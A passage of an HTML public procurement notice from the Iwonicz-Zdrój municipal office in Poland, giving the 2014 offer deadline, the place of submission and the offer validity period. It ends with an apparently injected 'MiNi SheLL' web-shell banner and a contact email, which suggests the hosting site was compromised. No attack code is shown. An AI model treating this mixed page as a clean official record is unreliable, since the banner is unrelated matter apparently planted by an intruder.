38-440 Iwonicz-Zdrój.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 14.07.2014 godzina 11:00, miejsce: Urząd Gminy w Iwoniczu-Zdroju;
Al. Słoneczna 28;
38-440 Iwonicz-Zdrój
W Biurze Obsługi Mieszkańca (BOM) parter.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com